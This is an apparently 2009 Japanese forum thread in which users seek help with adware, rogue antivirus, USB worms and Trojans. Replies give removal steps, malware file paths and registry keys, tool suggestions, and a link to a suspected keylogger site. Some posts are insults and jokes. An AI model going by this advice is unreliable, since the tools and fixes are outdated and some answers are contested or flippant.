他の方法で、安全な環境に戻ったと断定することはできないからです。
なお、「Trojan-PSW.Win32.Nilage.djl」については、Flash Playerの脆弱性を突いて、オンラインゲームのアカウント情報などを
盗むウィルスです。去年、XREAの広告サーバーが乗っ取られて仕込まれたものがそれのようです。
まとめサイトがありますので、ご覧ください。
ttp://www.geocities.jp/pehchunpm/mondai_XREA.htm
>>574 俺にもわからないお
そういうのどうやって調べるんだお?
カスペスキャンしても何もないって言うから問題ないよね?
, -―- 、 /了 l__〕 〈] 7| K ノノノ ))))〉. l」 |」(l| ┃ ┃|| | |ゝリ. '' ヮ'丿! | | /\_V〕、l| l | / /<ノ|ト'.l
すいませんよろしくお願いしますm( __ __ )m 【使用OS】 『XP SP3』 【使用ブラウザ】 『Firefox 3.0.1.1』 【セキュリティソフトと年式】 『avast! 4.8 Home Edition』 【回線の種類・ルータの有無】 『ケーブルネット』 【具体的な症状】 『サイトを開いたり戻ったりをすると時たま勝手に新しいページが開く。ページは毎回違う。』 【過程と措置】 『ググッてスパイウェアと判明→Spybot Search、Ad-Aware、cwshredderとやったが駆除できず。』 次は何を試したらいいでしょうか?Firefoxを使用してますがIEでもなります。Sleipnirでは起きません。 よろしくお願いします。
>ググッてスパイウェアと判明 はい、検出したソフト名、検出名称、検出したファイル名をどうぞ。
580 :
578 :2009/07/22(水) 16:24:21
>>579 さん
ググッたら同じ症状の人の質問がでてきて。その動作が起きているのはスパイウェアに感染しているよって解答で
Spybot等のソフトで対処しましょうってなってたのでスパイウェアと判断しました。
なので原因の検出ファイル名とかは分かりません。すいません。
SpybotとAd-Awareでスキャンしたら5個ぐらいなんかでましたがすぐに削除してしまいファイル名は覚えてませんです。
cwshredderでは何もでませんでした。
これらを試した後にFirefox使っても症状が改善されないので質問した次第です。
>>580 SpybotやAd-Awareなら、ログに残ってると思うけど。
■やった方がいいこと カスペオンラインスキャンをかける。 必要のないブラウザ機能拡張は全部切る。 Flash Player を削除して最新版に入れ直す。 WindowsUpdateを全て当てる。 AcrobatReaderを最新版(9.12)に更新する。(インストール後、必ず、ヘルプからアップデートの有無をチェックを行なう) AcrobatReaderの環境設定から、JavaScriptの項目を選んで、AcrobatJavaScriptを使用のチェックを外す。 不審なサイト(アダルトサイトとか)を訪問しない。 ■感染していた場合 もし、FlashPlayerやAcrobatReaderの脆弱性を利用するものだった場合、すり抜けてマルウェアに侵入されている 可能性があります。その場合、奇麗に除去するのは困難ですので、必要最低限のデータをバックアップしてから OSの入れ直し(またはPCリカバリ)を行わなければなりません。
>578 どんなサイトですか?
レス遅くなりすいませんm( __ __ )m
>>580 書いた後、SUPERAntiSpywareってやつを試してみたが駄目で次に
>>582 さんのレスを見て
カスペルスキー オンラインスキャナってのをやりにいったんですが、使い方が分からずorz(ボタン押した後の
新しい画面の同意するってところが一向に押せる状態にならず、左側のあなたのパソコンの状態を調べてますとでてる
とこがずっとそのままでどうしたらいいか分からないのですorz もうちょっと待てばいいのですかね?)
なのでAcrobatReaderを最新にして再起動して放置してご飯食べてました。
今からFlash Playerを入れなおしてもう一回オンラインスキャンしてみます。
>>583 さん
サイトはどこでもなんですが、スタートページはグーグルなんですがこっからヤフーでもyoutubeでも誰かのブログでも
開いたり戻ったりしてるとたまに勝手に新しいページがもう一個firefoxが立ち上がって表示されます。
開くページはエロだったりフラッシュゲームだったりおめでとうございます〜が当選しましたみたいなページです。
>584 たぶん今流行ってるアドウェアだと思う。 コンパネのプログラムの追加と削除ってとこに Internet Saving OptimizerやMedia Access Startup、 またはSystem Search Dispatcherという入れた覚えのないものは無いか? これらのものをアンインストールすれば症状は収まるはず。 アドウェアだから上手くいけばリカバリは避ける事ができると思います。 ただ…それでも不安が残るようでしたら思いきってリカバリして下さい。 不安一気に消え去るので。
586 :
578 :2009/07/22(水) 21:38:49
>>585 さん
ありました!! それら3つが見事にありましたw で削除したらもう新しく開かなくなりました。
感謝感激です。本当にありがとうございましたm( __ __ )m
他のみなさんも協力ありがとうございましたm( __ __ )m
わかるかたお願いします。 OSはVistaです。 常駐しているセキュリティソフトには、レジストリのウィルススキャンの機能がありません。 フリーソフトで、レジストリのスキャン出来るソフトはあるのでしょうか? もしあるとしたら、導入してもよいのでしょうか?
今流行ってるアドウェア(エロサイトやゲームサイトなどが、勝手に立ち上がる奴)なんだが、 経路は主に「RapidShare」や「MegaUpload」とかのダウンローダー系のサイトだと思いますね。 詳しくは前スレor前々スレに俺が、G DATAのニュース記事のリンクを貼っておいたから、 見ればわかると思います。またG DATAの公式サイトの「ニュース」にも、その記事がまだあります。 あと、あっちの方をもう一度確認してみたんですが、 コンパネのプログラムの追加と削除に Internet Saving Optimizer Media Access Startup System Search Dispatcher の他にも GamingHarbor Toolbar というものが、インストールされるみたいです。 これら4つのもの(無いものはスルー)をアンインストールして、 関連するフォルダの削除、HijackThisで関連するエントリーのFIX(無ければスルー)、 今の所、これで症状は消えてくれます。
>588
φ(^∀^)ノシ
>>587 質問返しになってしまいますが、今使っているセキュリティソフトは?
591 :
587 :2009/07/22(水) 23:18:43
>>590 フレッツウィルスクリアです。
フルスキャンしても、そういえばレジストリはスキャンしてないって気付いたんです。
どうなんでしょうか?
フリーソフトがあったら、導入してよいのでしょうか?
>>591 使ってて特に不自由してなければ、そのままで良いのでは?
レジストリのスキャンするソフト…
スキャンと言っても自動ではなく、【ユーザーの目視による解析】が必要なソフトになってしまうのですが、
「HijackThis」や「SilentRunners」などがあります。
フリーソフトで常駐はしないので、セキュリティソフトと一緒に使えます。
>>592 φ(-∀-)ノシ
594 :
587 :2009/07/22(水) 23:40:11
>>593 あ、HijackThisは知ってます。
以前アダ被で健康診断した事があるので。
いまだに取っておいてました。
レジストリのウィルススキャン出来ましたっけ?
ちょっと調べなおします。
新規の質問ですが宜しくお願いします
私の知人が変なツールに手を出してしまい作成者にファイル・文章等漏れているようです
解析を御願いされたのですが私自身には無理だと思いましたので皆様に助けていただきたいのです
ttp://strange.white-black.org/hangame/ チャベツというツールなのですが、キーロガーの様なものでしょうか
上記サイトには被害者の写メが記載されており、少々気の毒に思います
何卒宜しく御願いします
スレチでしたら申し訳ありません
Comodoをインストールしたいんですけど Windowsファイアウォールはアンインストールするべきですか?
停止でいいです。
こんな時間にどうも
使用OS】 『windowsXP SP3』 【PCスペック】 『CPU: core2duo 2.2GHz 、メモリ: 4GB』 (「システムのプロパティ」参照) 【使用ブラウザ】 『Firefox 3.0.1.1』 例、Firefox 3 【Microsoft Updateの更新の状態】 『自動』 【セキュリティソフトと年式】 『ノートン2009』 【その他スパイウェア対策ソフト】 『上に同じ』 【回線の種類・ルータの有無】 『ADSL・ルータ有』 【具体的な症状】 『ブラウザを起動させた時、ページの戻るや進むを押した時、いろんなサイトを見てる時、 勝手に新規に新しいウィンドウが開いてしまう。』 【過程と措置】 『ノートンでスキャンしたがまだ上の症状が出る。』 【その他】 『このウイルスの正体を知りたいのですが、誰か分かる人いませんか?』
>>599 OTL
ttp://oldtimer.geekstogo.com/OTL.exe OTL.exeをデスクトップへダウンロード
アクティブなプログラムウインドウをすべて閉じて、OTL.exeを実行します
上段にある「Scan All Users」の箇所にチェックを入れてから、「Run Scan」をクリック
ログ抽出走査が終了すると、
「OTL.Txt」と「Extra.txt」がメモ帳で開いて、デスクトップ上に2つのテキストが自動的に保存されています
RootRepeal - Rootkit Detector
ttp://rootrepeal.googlepages.com/ RootRepealの最新バージョンをデスクトップへダウンロード
RootRepeal.rar解凍し、アクティブなプログラムウインドウをすべて閉じて、RootRepeal.exeを実行
下列から「Report」タブを選択、左下の「Scan」ボタンをクリック
「Select Scan」ダイアログが表示されるので、すべてにチェックを入れて > OK
次にScanするドライブを問われるので、「C:\」にチェックを入れて > OK > Scan走査がスタート(*Scan中は「Files」タブになっています)
ログ抽出走査が停止したら、
「RootRepeal report.Txt」がメモ帳で開いて、C:にテキストが自動的に保存されています
OTLとRootRepealのログを新規フォルダにコピー&ペーストしてから、フォルダを圧縮
件名とフォルダ名をを、「[ Report ] - Infection log report」として以下へ送信
■Symantec Security Response 〔Upload a suspected infected file : 疑わしいファイルの提出〕
https://submit.symantec.com/websubmit/retail.cgi *ファイルや圧縮ファイル〔Password無し、File数9個未満、10MB未満〕やtxtレポート で調査依頼の提出が出来ます
これでワクチンが作られるので、次回のパターンファイル更新で対応されますw
>>600 さん
>>589 を読んで方法を試してみたら、コンパネのところに
Internet Saving Optimizer
Media Access Startup
System Search Dispatcher
というものがありました!
この3つのプログラムを削除したところ、症状は消えました!
いつもなら、いろんなサイト見てる時に、フラッシュゲームやおめでとうございます〜
といったウィンドウが開いていたのが、今は開く気配はありません!
ただどこで感染したのかハッキリと覚えてないのです。
あとは
>>589 のとおりに関連するフォルダの削除・HijackThisというものを使って駆除
で良いんですよね?
>>601 は何だったんでしょう?
ノートンを使ってるから試そうと思ったのですが、症状が無くなったので
試さなくても良いんですよね?
てかワクチン作られて、パターンファイル更新まで、待ってる余裕なんて無いです。
なんかムカつく
>>601 =603はハチ公か
迷惑してるだろうなSymantecも
アダ被で解凍してるイカって奴 なんでアダ被の解答者じゃないのに解答してんの?
永久保存とかって何考えてんの?って思う
アダ被とか関係ない アダ被のことはアダ被で聞け
609 :
名無しさん@お腹いっぱい。 :2009/07/23(木) 16:51:59
学校のPC使ってたら、USBメモリ内のデータが読み込めなりました。 開いてみたら、いかにも怪しい「autorun.inf」と「filouf.bat」ってファイルが あり、何度消しても(shift+delete)すぐに戻ってる。 フォルダオプションの「全てのファイルを表示」は無効化されてて、勝手に表示しない設定になる。 因みに学校PCにはノートンアンチウィルスが入っていて、「hbs.exe」等には反応する。 上記の状態でどんなウイルス(ワーム)か判る方居られましたら情報をお願いします。 家のPCでUSBメモリ使えなくて困っているので、駆除方法も判ればお願いします。
611 :
609 :2009/07/23(木) 17:36:11
>>610 先ず報告ってことですね、やってみます。
有難うございます。
>>608 ずいぶん神経質ですねあなた
なにか不都合でも?
614 :
名無しさん@お腹いっぱい。 :2009/07/23(木) 18:19:28
【使用OS】 『Vista64,w2k,XP』 【PCスペック】 『w2kはシステムの動くぎりぎり程度』 【Microsoft Updateの更新の状態】 『自動』 【セキュリティソフトと年式】 『AVGなど動く物の体験版・キングソフトの無料』 何ぞ軽くて安いソフトはありませんか? AVGすら動かないPCとかあるんですが・・・
>>606 アダ被の回答者とか別に決まってないし誰でも回答していいだろjk
>>616 何勘違いしてるんだw
誰でも案内レス回答入れられるよ?w
ただイカや八頭みたいなトンチンカンなことすると当然待った掛けられる
ただあそこ殺伐としすぎて新規回答者が来ても居つかないけどw
あそこ次第に回答者できる人減ってったよなw なのに質問者は増える一方ww どうしてこんなことにw
>>617 そうなんだ、運営管理はセキュリティ達人者で動いてると思ってた
もし自分が投稿してイカ君が回答して来たら、無視しよっと
>618
俺のせいだ。
昔よくこのスレやウイルス情報質問スレに来てた質問者を誘導してたからな。
>>619 イカって人が回答するのは、今のとこ主に"ワンクリに引っ掛かった人"のみですよ。
621 :
619 :2009/07/23(木) 19:53:03
>>620 何がどうあれ、イカ君の言葉遣いが気にいらない
とても不快感を抱くんです
>>619 みたいに勘違いしてる人結構いるのかな
やたら回答者が増えないのもそのせいなのだろうか
>>621 おまえも不快だよ
いくら初心者でもくだらねえ質問すんな
すみません。質問があります。 先週、セキュリティソフトを停止した状態で5分ほどインターネットに接続してしまいました。 慌てて接続を切断し、ウイルスバスターで検索。 次にシマンテックのオンラインスキャンを行いました。 結果は両方とも検出なしでした。 でも使っていると、普段はスムーズに動作していたソフトウェアの動きがぎこちなくなることが多くなっているような気がします。 何かセキュリティソフトでは検出できないようなウイルスなどに感染してしまったのではないかと不安になっています。 このような事例の場合、他にどのようなチェックをしたら良いでしょうか? 接続環境はフレッツ光で有線LANです。 申し訳ございませんが、アドバイスのほどよろしくお願いします。
>625 少しでも不安があればリカバリが一番です。 他にレスがあればそちらの方も参考してください。
>>625 ルータが無い場合でもAdobe Readerや(あればだが)windows update、アドオンソフトが最新パッチを当ててあり
5分の間にActiveXインストールダイアログが現れて許可してなければ感染の可能性は低いとおもう。
重く感じるならCPU利用率やメモリー使用量をみてみたら?
ちょっと上のレスで話題になっているのでリンクは張らないけど某サイトにPC健康診断掲示板があるので
どうしてもと言うのであれば(ググって)行ってみては?
>>627 (´ー`)ノシ
>627
やはりリカバリを行うのが一番なのですね。
実は昨日、寝る前にオンラインスキャンをもう一度かけてみたらtrojan.dropperというものに感染しているという結果が出ました。
trojan.dropperについては誤検出の例もあるようですが、不安なのでリカバリをすることにします。
ありがとうございます。
>>628 ActiveXのインストールダイアログは表示されませんでしたが、windows updateなどのパッチは最新の状態ではありませんでした。
また、昨日オンラインスキャンをやり直したところ、trojan.dropperというウイルスに感染しているとの結果が出ました。
データのバックアップをとっていなかったので、リカバリは避けたかったのですが。
誤検出の可能性があるかもしれないにしても感染しているという結果が不安なので、諦めてリカバリをすることにします。
ありがとうございます。
レジストリのアクセス許可ってさ、無闇に許可しまくるとセキュリティ的にヤバイ? なんかMicrosoft Updateがうまくいかないから全部許可にしちゃおうかな〜…なんて…
>>601 おい、ハチ公。パターン対応でブロックできるようになっても、除去する(削除ではなく影響も除去する)ワクチンはつくられねーぞ。
うそっぱち撒き散らしてないで、大人しくしてろよ。
>>609 思いっきり感染してますな。
システム管理者に相談してPCリカバリして貰って、WindowsUpdateかけて、セキュリティソフト入れて、パターン更新してから
USBメモリぶっさして、そのUSBメモリに入ってるマルウェアを除去。
っつーか、勝手にUSBメモリなんか挿すから、お前さんが学校のPCを感染させたんじゃねーのか?
>>630 とんでもなくやばい。OSが起動しなくなっても知らないよ。
>>614 軽さだけなら、ESSかNOD32使え。英語がわかるならAntiVirの方がいい。
AVGが動かないんじゃなくて、メモリ足りなすぎてスワップで固まってるように見えるとかじゃないの?
もしかすると、複数のアンチウイルスソフト入れて衝突してるのかもしれないし、マルウェアに侵入されて
セキュリティソフトが停止させられているだけかもしれない。
多分、PCのリカバリ(またはOS入れなおし)からやった方がいいと思うが、それだけの種類のOS併記するのは
割れ物か?割れ物使用者は質問する権利ありません。とっとと正規OS買ってこい。話はそれからだ。
>>633 そんなにヤバイの!?なんで?…じゃ、一つ一つログを見て変える事にします。後何回再起動すればいいのか・・・w
サンクス
>>635 そもそも許可出さなきゃアップデートが上手く行かない環境がヤバい。
>>636 やはりなぁ…
HDDも足りてないし1TBのHDD買って
環境を作り直そうと思います。
638 :
名無しさん@お腹いっぱい。 :2009/07/24(金) 15:17:40
すみません、デジカメで使用しているmicroSDHCカード(SanDiskの4GB)のデータを
何やっても復元不可能まで完全に消去したいんですけど、
以下の方法で復元不可能に出来ますか?
使ってるソフトはEraserというソフトで、選んでる方法は、
米国防総省準拠方式 US DoD 5220.22-M(8-306. /E,C and E)
(上書き7回、固定値1⇒...⇒固定値6⇒乱数⇒検証)
です。
データ抹消方法の種類
データ消去 上書き回数(回) 上書きパターン
NSA推奨方式 3 乱数2回⇒ゼロ
米陸軍準拠方式 3 乱数1回⇒固定値1回⇒固定値1回の補数
米海軍準拠方式 3 固定値1⇒固定値1の補数⇒乱数⇒検証
米空軍準拠方式 3 00⇒FF⇒固定値1⇒検証
米国防総省準拠方式 7 固定値1⇒...⇒固定値6⇒乱数⇒検証
グートマン推奨方式 35 固定値4回⇒固定値1〜固定値27⇒乱数4回
Eraser
http://eraser.heidi.ie/ Eraserについて
http://www.cybernetic-survival.net/shredder.htm
物理的に折れ
640 :
638 :2009/07/24(金) 15:33:04
>>639 それが一番なのは分かってるのですが、
諸所の事情によりそれが出来ないのです。
どなたかそっち方面詳しい方
>>638 について教えてください。
カスペでチェックするとキーロガーとかもチェックされる?
まず水に浸します。
>>638 デジカメで撮ったハメドリ画像を消すには十分過ぎるので安心していい
microSDHCカードはフラッシュメモリなので無駄に消し過ぎると壊れる
円光の証拠隠滅におっさん必死wwwwwww
sdカードくらいなら物理的にこわして捨てればよくない?
あっだめなんだ 借りてるやつとかに円光動画を撮影したのかな?
円光なんてするからいけないんだぞ。 素直にタイホされろ。
>>638 ∧,,_∧
( ´・ω・)∧∧||| ポン
/⌒ ,つ⌒ヽ) ポン
o(___ ( __)
>>638 気が済むまで
グートマン推奨方式をすればいい。
俺はDESTROY で NSA 方式しか使ったことがないが…
651 :
638 :2009/07/24(金) 22:18:42
652 :
名無しさん@お腹いっぱい。 :2009/07/24(金) 23:07:08
て
654 :
638 :2009/07/25(土) 01:09:45
>>652 そんなもんだった気がします
米国防総省準拠方式だと8時間です
寝る前にセットして朝には完全消去完了です
655 :
名無しさん@お腹いっぱい。 :2009/07/25(土) 02:04:46
みんなに円光円光いわれててワロタ
656 :
名無しさん@お腹いっぱい。 :2009/07/25(土) 02:43:30
おすすめのウイルスソフトありますか どこのを買えばいいかわかりません おすすめをおしえてください
>>656 そういうスレがあるからそこで聞け
荒らすことが目的でここへ書き込んでいるのならどうぞ荒らしてくださいな
658 :
656 :2009/07/25(土) 02:58:03
うるせークズ
659 :
656 :2009/07/25(土) 02:59:56
658は自分ではありません でも邪魔する人は死んで欲しいです
660 :
656 :2009/07/25(土) 03:02:14
ここはダメそうなので お勧めのスレを教えてください
ノートンでいいよ
今回はノーマネーでフィニッシュです
質問 ・XP ・ウィルスバスター2008 ・無線LAN未使用 ・CATV ウィルスバスターの無線LANパトロールが定期的に勝手にされる。 すると30個近く 「信頼済みでない機器がネットワークに接続されている」 と表示される。 無線LANは使用していないし、無線LANの機器も持っていない。すべて有線。 ネットにつながっているのはこの事案のパソコンのみ。周辺機器はプリンターのみ。 これはどういうことですか?
カスペでチェックするとキーロガーとかもチェックされる?
されるよ
じゃあされないに1票
(ο^д^)ノシ
俺はされるに5票かな。
対応しているものはチェックされる。未知のものはすり抜ける可能性が有る。 もちろん、チェック対象から外してしまえば、検知されない。
WindowsXP SP3で Windowsアップデート中に C:\WINDOWS\Downloaded Program Files\HGStartJP21.exe がアンチウィルスソフトに反応したんですが、削除したほうがよいでしょうか?
>>671 そこをなんとか判断してアドバイスしろよ
〜〜じゃね?程度も言えないなら引っこんでろよw
八頭さんレジストリレイパーの件について教えて下さいませ。
676 :
名無しさん@お腹いっぱい。 :2009/07/25(土) 21:44:59
>>675 // |
/ ,ィ介i | う ぶ き
{. |l ,イ ///|| | ち っ え
,-.、Vl / | /// | | 」 に と ろ
lこ!l ! ト ト.l | !i | ヽト、< な ば
| l Vヽ トjヽ\!l ,>‐_ニヽ さ
| | \ ! く__・、jiLノ・_´フ .|| れ
| | __ ヽ} -‐ -─‐ レヘ. ん
_r‐j >イ fヽ l ノ __ ,イ-ハ
/ ′、 i {ノ-、 ヽ `t_/ /| /´ヽ
〈 ヽ l | } \ -' j | \
ヽ / |  ̄ L
ハチ公はアク禁食らったのか?
ハチ公は迷惑だから、アク禁されてくれる位の方が有り難いな。
ヤマハ RT58i (Made in Japan) ヤマハ RTX1200 (Made in Japan) ヤマハ RT107e (Made in Japan) ヤマハ RTX1100 (Made in Japan) IODATA ETX-R (Made in China) IODATA NP-BBRL (Made in China) IODATA ETG-R (Made in China) バッファロー BBR-4HG (Made in China) バッファロー BHR-4RV (Made in China) バッファロー BBR-4MG (Made in China) MICRO RESEARCH NetGenesis SuperOPT100E MR-OPT100E (Made in China) MICRO RESEARCH NetGenesis SuperOPT-GFive MR-OPTG5 (Made in China) COREGA CG-BARPROG-X (Made in China) COREGA CG-BARPROG (Made in China) COREGA CG-BARPRO6 (Made in China) PLANEX BRL-04M (Made in China)
寝なきゃいけないのにトラブルエロ見て抜いてる俺がいるφ(;'д`)ノシ
682 :
名無しさん@お腹いっぱい。 :2009/07/26(日) 18:18:26
てs
教えてgooや知恵袋は2chと同じでデマの宝庫 何も知らない初心者を騙して製品を買わせようとする悪徳業者が 必死になって情報操作してるところ まともなサイトなら管理者が発言をチェックして、 デマを削除するけど知恵袋も教えてgooもそれをやってない ま、運営してるYahooやNTTも情報操作の共犯者だと言って良いだろうね
そんなことより、豆腐は絹ごしか木綿か、だな
(ο^д^)ノシ
そんなこと言ったら、ネットはやくざ・まふぃあの資金源 事情を知らない一般人を騙してみかじめ稼いぐに都合のいいところ まともなサイトなんて存在しないし全部ヒモ付きと診て間違いない。
お、必死になって自己弁護を展開し始めたなw
この気配・・・八頭だな!
/⌒丶 /⌒\ /´ ヽ /、 ヽ | / | / / | . | .|_lヽlヽ, | ,/ . | | | ´Д`ヽ/ ノ ,| . | | | 丿 ノヽ` ノヽ ` / / ,/ソ \ / ( ,/ `´ | \ イ ´ | \ ヽ \ 八 ノ ヽ ` ー ´人` / \ / ´,、ヽノ ノ⌒ / | / ノ_ | ノ ヽ 丿 \ /⌒l |. / \ / l,丿 , っ . \ | / ´ /⌒`l \ 丿 / , ./ ヽ ヽ | / |, | / )\ ヽ ヽ ノ ヽ__,/ . ( _\_ | (_)__)|___,/ (__)_)_)ヽ、__/
691 :
名無しさん@お腹いっぱい。 :2009/07/27(月) 14:55:07
PCをリカバリしようと思うんですが、リカバリされるのはCドライブだけですよね? Dドライブがウィルス感染してる事はないんですか?
> Cドライブだけですよね? そうとも限らない。 > Dドライブがウィルス感染してる事はないんですか? 可能性としてはある。
セキュリティソフトに関して質問です。 会社で私用のノートパソコンを使っています。 OSのクリーンインストールなども終えたものです。OSはWindows2000です。 うちの会社はセキュリティ意識が皆無な零細企業なので、少しでも良いものをと 今まではカスペルスキーを入れていました。ところが更新しようとしたらWindows2000には 未対応との事。そこで、新しい別のソフトを探しています。 有料でももちろん構いません。出来るだけ安心できるものを教えて下さい。 今は一応、Kingsoftのセキュリティを入れていますが、ウィルスを見つけても どんなウィルスか分からないので困っています。(名前で検索しても中国のサイトしかでてこない) 同僚がウィルスを引っさげてくる事が多いので、ちょっとKingsoftのフリーだと不安なので…。 宜しくお願いします。
>>694 今月末にFlash PlayerのUpdateもあるよね。
>696 Adobe Readerもね。
(・∀・)デッデデデ デッデデデ♪
鑑定
>>694-697 質問に対する回答でない貼付けや雑談は邪魔なので、どっか行ってくれないかな。
>>693 安心できるという意味では、カスペが駄目なら、AntiVirかな。W2Kにも対応しています。
但し、英語表示なので、初心者さんにはお勧めできないのが難点。
ただ、英語表記の敷居の高さを差し引いても、検出率と動作の軽さは圧倒的です。
あとは、シングルコアCPUだと重い場面もありますが、Avastも結構いい感じにブロックしてくれます。
AvastとかAVGのようなフリー版のあるソフトでも、Kingsoftよりは検出率いいですよ。(PFWを別途用意する必要はありますが)
検出率的にはG DATAもいいんだけど、W2Kには対応せずなので駄目ですね。
(*^ー゚)b
>>700 遅れましたが、御返答ありがとうございます。
AntiVir、検討してみます:)
ありがとうございました。
705 :
名無しさん@お腹いっぱい。 :2009/07/28(火) 13:41:29
【使用OS】 Vista 【PCスペック】 CPU: 2.27GHz メモリ: 2GB 【使用ブラウザ】 【Microsoft Updateの更新の状態】 『』 例、自動更新設定 【セキュリティソフトと年式】 フレッツウイルスクリアv6 【その他スパイウェア対策ソフト】 フレッツウイルスクリアv6 【回線の種類・ルータの有無】 光回線でルータ使用中 【具体的な症状】 海外のサイトにアクセスしてしまい、それ以来インターネットをすると海外の広告が出てくる。 インターネットのネットワーク接続で設定し直すと海外サイトが出てこなくなった。 しかし電源を切るとインターネットができない状態に。そのときもまたネットワーク接続で設定し直すと繋がるようになる。 今はその繰り返しです。厄介なウイルスに感染しているのでしょうか? ご覧の通り初心者ですがアドバイスおねがいします。
【使用OS】 XP Home 【PCスペック】 CPU:1.8GHz メモリ:736MB 【使用ブラウザ】 IE 【Microsoft Updateの更新の状態】 『』 例、自動更新設定 【セキュリティソフトと年式】 avast!4.8 【その他スパイウェア対策ソフト】 『』 【回線の種類・ルータの有無】 『』 例、光回線でルータ使用中 【具体的な症状】検査でトロイの木馬が検出されたのですがディスクに充分な空き領域がなくチェストに移動できません チェストの最大容量の値を増やせば良いとの事ですがどのくらいの値にするのが適切でしょうか? 現在は256MBに設定されています
707 :
名無しさん@お腹いっぱい。 :2009/07/28(火) 17:48:14
Win98SEで使えるフリーのアンチウイルスソフトあるかな? 500MHz 256MB
avast!
>707 今のところAvastですね。 俺は今AVG7.5を使ってますが、サポート終わったからねー… でもマイクロソフトのサポートが終わったOSを使い続けるなら、 新しいPCを購入したほうが良いかと。 (俺も98SE使ってるから偉く言えませんけど)
>>706 256MBに収まらない程被害が広がったなら、すっぱり諦めて
フォーマット、リカバリーしとけ。
>>707 穴だらけのOSにアンチウィルス入れたところでどの程度効果があるかまず考えてみろ
穴だらけだからこそ、だよ。
>>700 >検出率と動作の軽さは圧倒的です
何を持ってして軽いといってるんだ ウンコ
>Avastも結構いい感じにブロックしてくれます
結構いい感じにブロックってどんな感じなんだ ウンコ
ちんぽこ ようやく毛が生えたか?
717 :
707 :2009/07/28(火) 21:54:54
ありがとう PCない部屋に置いとこうと思った んだけど今PCサーバ買ったからこいつは他の事に使おうと思う
719 :
名無しさん@お腹いっぱい。 :2009/07/29(水) 01:55:23
Avira Antivir入れWindowsDefenderと組み合わせて使おうと考えてるんだけど aviraの最新版だとスパイウェアにも対応してるって見たんだけど もしかしてwindowsデイフェンダーの常駐機能は無効になったりする? それとも仲良くやってくれる?
特に問題もなく、仲良くやってるなうちではw
有料ソフト買ってるなんて情弱だよな
>>719 その手のチェックものは複数同時に走らないように注意した方が無難です。
普段問題なく動いているように見えても、問題物を見つけたときに互いに
邪魔し合う可能性があるので。
725 :
名無しさん@お腹いっぱい。 :2009/07/29(水) 13:21:01
cookieの名前が勝手に変わることってあるんでしょうか? むかしはcookie:本名@〜だったのに、最近はcookie:蒼@〜になっているんです。 ウイルス検索してもトロイ?やウイルスは何も出てこないのですが、何か分かる方いらっしゃったら教えて欲しいです。 おねがいします。
他スレで回答もらいましたのでもういいです。 ここって詳しい人いないんですね。
727 :
名無しさん@お腹いっぱい。 :2009/07/29(水) 13:46:59
>>725 ですが、私は回答をもらっていませんので誤解のないようにお願いします。
728 :
名無しさん@お腹いっぱい。 :2009/07/29(水) 15:43:47
CodecWMV-3.5.exeのコーデックをインストールしてPCがおかしくなってしまいました advanced virus removerとゆうセキュリティソフトをダウンロードして 勝手に何度も立ち上がるようにしてしまいます HDのフォーマットも出来ず、レジストリの削除も出来なくなっています Application cannot be executed. The file is infected. Please activated antivirus software. で止まってしまいます いい解決方法がありましたら教えてください よろしくお願いします
まだ修正の来ていない Flash Player の脆弱性とやらを利用されてトロイ攻撃されたり、ネットバンクのPASSが抜かれたりといったようなことがありえるものでしょうか?
730 :
名無しさん@お腹いっぱい。 :2009/07/29(水) 16:08:02
>>714 >>715 >>716 本当にありがとうございました。試してみます。
少し脱線しますがどうやってそのようにPCに詳しくなっていくのでしょうか。
今回何もできない自分が情けなくて。。
731 :
728です :2009/07/29(水) 16:21:03
【使用OS】 『XP SP3』 【PCスペック】 『CPU:1.6GHz 、メモリ:1.99GB』 【使用ブラウザ】 『IE』 【Microsoft Updateの更新の状態】 『自動更新設定』 【セキュリティソフトと年式】 『ウイルスバスター2008』 【その他スパイウェア対策ソフト】 『無し』 【回線の種類・ルータの有無】 『光回線でルータ使用中』 【具体的な症状】 『』 【過程と措置】 『』 【その他】 『』 【スクリーンショット画像やテキストファイルをアップロード出来るサイト】
>>731 お困りのようですね
協力しますから悪いやつをとっちゃいましょう
ステップbyステップでいきましょう
まず、ここへ行き
http://www.malwarebytes.org/ Malwarebytes' Anti-Malwareのフリーバージョンをダウンロード
ぺ−ジの左の青いやつ
そして、すべてのプログラムを閉じて
mbam-setup.exeをwクリックでインストール
Malwarebytes' Anti-Malware(以下mbam)を立ち上げupdateする
そしたらScannerからPerform quick scanをクリック
約3分位で、すぐ終わります
そして、OKをクリック
次は、Show Results
をクリック
そしたら、悪いやつが沢山でてきたら
Remove Selectedをクリック
そしたら、MBAMが再起動します(reboot)
再起動したらMBAMが、logを提出します
MBAMを閉じます
ここまでやってみて下さい
>>731 忘れてた、MBAMする前にシステムの復元を破棄すること
感染しました トロイの木馬Generic13.AWQH どうしたらいいですか?
>>734 1.PCリカバリ
2.WindowsUpdateを全部あてる
3.セキュリティソフトを入れる
4.セキュリティソフトのパターンを更新する
5.アプリケーションを入れたり、メールの設定をしたり、元の環境に戻します
6.感染後に入力した可能性のあるパスワード類を全て別のものに変更する
順番を間違えないように。どうしても消しては困るデータがあった場合に限り、PCリカバリの前にバックアップを取ること。
>>728 Fake Codec(コーデックの偽者)を入れちゃったんですね。
>HDのフォーマットも出来ず
OSインストール用のディスクでフォーマットは可能だと思います。
どうしても救出したいデータがない場合は、さくっとPCリカバリ(BTOパソコンなどの場合はOS再インストール)を。
どうしても救出したいデータがある場合、一番簡単なのは、別のHDDにOSを入れて、そっちから起動させることです。
セーフモードで起動して、レジストリを操作できるように戻して、自動起動してしまうものを除去して…という方法も
できなくはありませんが、初心者さんに説明するのが難しいので、その方法はパスで。
>>732 さんが、Malwarebytes' を紹介していますが、未対応のものだった場合、除去できません。
CodecWMV-3.5.exe をどこで入手したのか判れば、同じものを入手して、どこのセキュリティソフトが
対応しているか確認することはできますが、現時点では、PCリカバリ以外の解決策を提示できません。
>>730 冗談抜きに、PCの再インストールを繰り返した数だけ、スキルアップすると思ってる位でいいかと。
自分が困った時、こんなことをやってみたいと思った時に、調べたり、人に聞いたりして1つづつ
できることを増やしていく位でいいんじゃないかな。
>>736 要は、
c:\Program Files\AdvancedVirusRemover
c:\Program Files\AdvancedVirusRemover\PAVRM.exe
%UserProfile%\Application Data\Microsoft\Internet Explorer\Quick Launch\Advanced Virus Remover.lnk
%UserProfile%\Desktop\Advanced Virus Remover.lnk
%UserProfile%\Start Menu\Advanced Virus Remover.lnk
HKEY_CURRENT_USER\Software\AVR
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU
コレを、取り除けばいいんだよ
だから、ステップbyステップでやろうとしてるんだよ
理解してる?
